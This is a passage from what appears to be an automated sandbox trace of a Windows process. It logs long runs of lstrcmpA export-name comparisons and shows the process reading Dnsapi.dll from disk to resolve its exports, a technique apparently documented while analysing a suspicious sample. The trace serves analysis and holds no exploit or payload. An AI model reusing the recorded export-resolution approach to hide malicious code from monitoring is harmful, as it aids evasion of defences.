(lpString1="CertCloseStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.068] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0139.068] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0139.068] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0139.068] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0139.068] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0139.069] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0139.069] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0139.069] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0139.069] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddSerializedElementToStore") returned 1 [0139.069] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddStoreToCollection") returned 1 [0139.069] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAlgIdToOID") returned 1 [0139.069] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseServerOcspResponse") returned 1 [0139.069] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseStore") returned 0 [0139.069] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLContextToStore") returned 1 [0139.069] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLLinkToStore") returned 1 [0139.069] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLContextToStore") returned 1 [0139.069] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLLinkToStore") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateContextToStore") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCRLToStore") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCTLToStore") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToStore") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponse") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddSerializedElementToStore") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddStoreToCollection") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAlgIdToOID") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseServerOcspResponse") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseStore") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCompareCertificate") returned 0 [0139.070] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLContextToStore") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLLinkToStore") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLContextToStore") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLLinkToStore") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateContextToStore") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCRLToStore") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCTLToStore") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToStore") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponse") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0139.070] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddSerializedElementToStore") returned 1 [0139.071] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddStoreToCollection") returned 1 [0139.071] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAlgIdToOID") returned 1 [0139.071] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseServerOcspResponse") returned 1 [0139.071] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseStore") returned 1 [0139.071] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificate") returned 1 [0139.071] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificateName") returned 0 [0139.071] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLContextToStore") returned 1 [0139.071] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLLinkToStore") returned 1 [0139.071] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLContextToStore") returned 1 [0139.071] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLLinkToStore") returned 1 [0139.071] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateContextToStore") returned 1 [0139.071] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.071] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCRLToStore") returned 1 [0139.071] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCTLToStore") returned 1 [0139.071] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToStore") returned 1 [0139.071] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0139.071] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0139.071] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0139.071] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponse") returned 1 [0139.071] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0139.071] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddSerializedElementToStore") returned 1 [0139.071] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddStoreToCollection") returned 1 [0139.071] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAlgIdToOID") returned 1 [0139.071] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertCloseServerOcspResponse") returned 1 [0139.097] GetProcessHeap () returned 0x530000 [0139.097] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x411a040 | out: hHeap=0x530000) returned 1 [0139.308] GetProcessHeap () returned 0x530000 [0139.308] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x10) returned 0x549260 [0139.309] LoadLibraryA (lpLibFileName="Dnsapi.dll") returned 0x7ffc5a8a0000 [0139.322] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0139.322] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0139.322] GetModuleFileNameA (in: hModule=0x7ffc5a8a0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0139.323] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0139.323] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0139.323] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0139.323] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=686984) returned 1 [0139.323] GetProcessHeap () returned 0x530000 [0139.323] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xa7b88) returned 0x3a8d010 [0139.325] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0139.326] ReadFile (in: hFile=0x17c, lpBuffer=0x3a8d010, nNumberOfBytesToRead=0xa7b88, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x3a8d010*, lpNumberOfBytesRead=0x14f5a4*=0xa7b88, lpOverlapped=0x0) returned 1 [0139.570] CloseHandle (hObject=0x17c) returned 1 [0139.571] lstrcmpA (lpString1="AdaptiveTimeout_ClearInterfaceSpecificConfiguration", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 0 [0139.571] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.571] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 0 [0139.571] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.571] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.571] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 0 [0139.571] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.571] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.571] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AddRefQueryBlobEx") returned 1 [0139.571] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="BreakRecordsIntoBlob") returned 0 [0139.572] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.572] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.572] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AddRefQueryBlobEx") returned 1 [0139.572] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="BreakRecordsIntoBlob") returned 1 [0139.572] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="Coalesce_UpdateNetVersion") returned 0 [0139.572] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.572] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.572] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AddRefQueryBlobEx") returned 1 [0139.572] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="BreakRecordsIntoBlob") returned 1 [0139.572] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.572] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="CombineRecordsInBlob") returned 0 [0139.572] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.572] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.572] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 1 [0139.572] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="BreakRecordsIntoBlob") returned 1 [0139.572] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.572] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="CombineRecordsInBlob") returned 1 [0139.572] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="DeRefQueryBlobEx") returned 0 [0139.572] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.572] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.572] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AddRefQueryBlobEx") returned 1 [0139.572] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="BreakRecordsIntoBlob") returned 1 [0139.572] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.572] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="CombineRecordsInBlob") returned 1 [0139.573] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DeRefQueryBlobEx") returned -1 [0139.573] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DelaySortDAServerlist") returned 0 [0139.573] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.573] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.573] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AddRefQueryBlobEx") returned 1 [0139.573] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="BreakRecordsIntoBlob") returned 1 [0139.573] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.573] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="CombineRecordsInBlob") returned 1 [0139.573] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DeRefQueryBlobEx") returned 1 [0139.573] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DelaySortDAServerlist") returned 1 [0139.573] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DnsAcquireContextHandle_A") returned 0 [0139.573] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.573] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.573] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AddRefQueryBlobEx") returned 1 [0139.573] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="BreakRecordsIntoBlob") returned 1 [0139.573] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.573] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="CombineRecordsInBlob") returned 1 [0139.573] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DeRefQueryBlobEx") returned 1 [0139.573] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DelaySortDAServerlist") returned 1 [0139.573] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_A") returned 1 [0139.573] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_W") returned 0 [0139.573] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.573] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.573] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AddRefQueryBlobEx") returned 1 [0139.573] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="BreakRecordsIntoBlob") returned 1 [0139.573] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.574] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="CombineRecordsInBlob") returned 1 [0139.574] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DeRefQueryBlobEx") returned 1 [0139.574] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DelaySortDAServerlist") returned 1 [0139.574] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_A") returned 1 [0139.574] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_W") returned 1 [0139.574] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAllocateRecord") returned 0 [0139.574] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.574] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.574] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AddRefQueryBlobEx") returned 1 [0139.574] lstrcmpA (lpString1="DnsApiAlloc", lpString2="BreakRecordsIntoBlob") returned 1 [0139.574] lstrcmpA (lpString1="DnsApiAlloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.574] lstrcmpA (lpString1="DnsApiAlloc", lpString2="CombineRecordsInBlob") returned 1 [0139.574] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DeRefQueryBlobEx") returned 1 [0139.574] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DelaySortDAServerlist") returned 1 [0139.574] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0139.574] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0139.574] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAllocateRecord") returned 1 [0139.574] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsApiAlloc") returned 0 [0139.574] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.574] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.574] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AddRefQueryBlobEx") returned 1 [0139.574] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="BreakRecordsIntoBlob") returned 1 [0139.574] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.574] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="CombineRecordsInBlob") returned 1 [0139.574] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DeRefQueryBlobEx") returned 1 [0139.574] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DelaySortDAServerlist") returned 1 [0139.574] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_A") returned 1 [0139.574] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_W") returned 1 [0139.574] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAllocateRecord") returned 1 [0139.575] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAlloc") returned 1 [0139.575] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAllocZero") returned 0 [0139.575] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.575] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.575] lstrcmpA (lpString1="DnsApiFree", lpString2="AddRefQueryBlobEx") returned 1 [0139.575] lstrcmpA (lpString1="DnsApiFree", lpString2="BreakRecordsIntoBlob") returned 1 [0139.575] lstrcmpA (lpString1="DnsApiFree", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.575] lstrcmpA (lpString1="DnsApiFree", lpString2="CombineRecordsInBlob") returned 1 [0139.575] lstrcmpA (lpString1="DnsApiFree", lpString2="DeRefQueryBlobEx") returned 1 [0139.575] lstrcmpA (lpString1="DnsApiFree", lpString2="DelaySortDAServerlist") returned 1 [0139.575] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_A") returned 1 [0139.575] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_W") returned 1 [0139.575] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAllocateRecord") returned 1 [0139.575] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAlloc") returned 1 [0139.575] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAllocZero") returned 1 [0139.575] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiFree") returned 0 [0139.575] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.575] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.575] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AddRefQueryBlobEx") returned 1 [0139.575] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="BreakRecordsIntoBlob") returned 1 [0139.575] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.575] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="CombineRecordsInBlob") returned 1 [0139.575] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DeRefQueryBlobEx") returned 1 [0139.575] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DelaySortDAServerlist") returned 1 [0139.575] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_A") returned 1 [0139.575] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_W") returned 1 [0139.575] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAllocateRecord") returned 1 [0139.575] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAlloc") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAllocZero") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiFree") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiHeapReset") returned 0 [0139.576] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AddRefQueryBlobEx") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiRealloc", lpString2="BreakRecordsIntoBlob") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiRealloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiRealloc", lpString2="CombineRecordsInBlob") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DeRefQueryBlobEx") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DelaySortDAServerlist") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAllocateRecord") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAlloc") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAllocZero") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiFree") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiHeapReset") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiRealloc") returned 0 [0139.576] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AddRefQueryBlobEx") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="BreakRecordsIntoBlob") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="CombineRecordsInBlob") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DeRefQueryBlobEx") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DelaySortDAServerlist") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_A") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_W") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAllocateRecord") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAlloc") returned 1 [0139.576] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAllocZero") returned 1 [0139.577] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiFree") returned 1 [0139.577] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiHeapReset") returned 1 [0139.577] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiRealloc") returned 1 [0139.577] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiSetDebugGlobals") returned 0 [0139.577] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.577] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.577] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AddRefQueryBlobEx") returned 1 [0139.577] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="BreakRecordsIntoBlob") returned 1 [0139.577] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.577] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="CombineRecordsInBlob") returned 1 [0139.577] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DeRefQueryBlobEx") returned 1 [0139.577] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DelaySortDAServerlist") returned 1 [0139.577] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_A") returned 1 [0139.577] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_W") returned 1 [0139.577] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAllocateRecord") returned 1 [0139.577] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAlloc") returned 1 [0139.577] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAllocZero") returned 1 [0139.577] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiFree") returned 1 [0139.577] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiHeapReset") returned 1 [0139.577] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiRealloc") returned 1 [0139.577] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiSetDebugGlobals") returned 1 [0139.577] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAsyncRegisterHostAddrs") returned 0 [0139.577] lstrcmpA 